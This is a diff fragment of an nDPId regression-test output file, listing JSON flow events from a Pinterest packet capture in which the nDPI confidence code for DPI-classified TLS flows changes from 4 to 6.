00670{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718346,"flow_last_seen":1605289718372,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":56940,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00614{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718346,"flow_last_seen":1605289718372,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":56940,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":12778,"flow_first_seen":1605289714142,"flow_last_seen":1605289717307,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65236,"flow_tot_l4_payload_len":20138391,"flow_avg_l4_payload_len":1576,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38512,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} -00725{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1605289714142,"flow_last_seen":1605289714258,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":343,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} -00725{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1605289714142,"flow_last_seen":1605289714259,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":324,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38516,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} -00725{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605289714142,"flow_last_seen":1605289714258,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":389,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38518,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} -00725{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605289714142,"flow_last_seen":1605289714258,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":389,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38520,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} -00725{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605289714142,"flow_last_seen":1605289714259,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":389,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38522,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} -00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1605289732959,"flow_last_seen":1605289733342,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":26978,"flow_avg_l4_payload_len":518,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38546,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} -00737{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1605289715966,"flow_last_seen":1605289733391,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":6358,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47790,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} -00717{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":808,"flow_first_seen":1605289714782,"flow_last_seen":1605289715303,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":16656,"flow_tot_l4_payload_len":1781636,"flow_avg_l4_payload_len":2204,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":57050,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"}} +00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":12778,"flow_first_seen":1605289714142,"flow_last_seen":1605289717307,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65236,"flow_tot_l4_payload_len":20138391,"flow_avg_l4_payload_len":1576,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38512,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} +00725{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1605289714142,"flow_last_seen":1605289714258,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":343,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} +00725{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1605289714142,"flow_last_seen":1605289714259,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":324,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38516,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} +00725{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605289714142,"flow_last_seen":1605289714258,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":389,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38518,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} +00725{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605289714142,"flow_last_seen":1605289714258,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":389,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38520,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} +00725{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605289714142,"flow_last_seen":1605289714259,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":389,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38522,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} +00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1605289732959,"flow_last_seen":1605289733342,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":26978,"flow_avg_l4_payload_len":518,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38546,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} +00737{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1605289715966,"flow_last_seen":1605289733391,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":6358,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47790,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} +00717{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":808,"flow_first_seen":1605289714782,"flow_last_seen":1605289715303,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":16656,"flow_tot_l4_payload_len":1781636,"flow_avg_l4_payload_len":2204,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":57050,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"}} 00671{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289714251,"flow_last_seen":1605289714288,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:13e2","src_port":34626,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00615{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289714251,"flow_last_seen":1605289714288,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:13e2","src_port":34626,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718347,"flow_last_seen":1605289718378,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54308,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718347,"flow_last_seen":1605289718378,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54308,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00734{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":116,"flow_first_seen":1605289715221,"flow_last_seen":1605289715740,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":16912,"flow_tot_l4_payload_len":133002,"flow_avg_l4_payload_len":1146,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54416,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00734{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":116,"flow_first_seen":1605289715221,"flow_last_seen":1605289715740,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":16912,"flow_tot_l4_payload_len":133002,"flow_avg_l4_payload_len":1146,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54416,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 00671{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289714250,"flow_last_seen":1605289714281,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33156,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00615{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289714250,"flow_last_seen":1605289714281,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33156,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289710318,"flow_last_seen":1605289710576,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00614{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289710318,"flow_last_seen":1605289710576,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289714250,"flow_last_seen":1605289714288,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":58726,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289714250,"flow_last_seen":1605289714288,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":58726,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00747{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":171,"flow_first_seen":1605289715782,"flow_last_seen":1605289724655,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":12420,"flow_tot_l4_payload_len":150127,"flow_avg_l4_payload_len":877,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f11f:83:face:b00c::25de","src_port":60340,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2804,"flow_first_seen":1605289713743,"flow_last_seen":1605289734948,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":13624,"flow_tot_l4_payload_len":3671715,"flow_avg_l4_payload_len":1309,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33262,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} -00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1605289714658,"flow_last_seen":1605289714873,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":7307,"flow_avg_l4_payload_len":221,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33280,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} +00747{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":171,"flow_first_seen":1605289715782,"flow_last_seen":1605289724655,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":12420,"flow_tot_l4_payload_len":150127,"flow_avg_l4_payload_len":877,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f11f:83:face:b00c::25de","src_port":60340,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2804,"flow_first_seen":1605289713743,"flow_last_seen":1605289734948,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":13624,"flow_tot_l4_payload_len":3671715,"flow_avg_l4_payload_len":1309,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33262,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} +00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1605289714658,"flow_last_seen":1605289714873,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":7307,"flow_avg_l4_payload_len":221,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33280,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} 00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289728586,"flow_last_seen":1605289728804,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 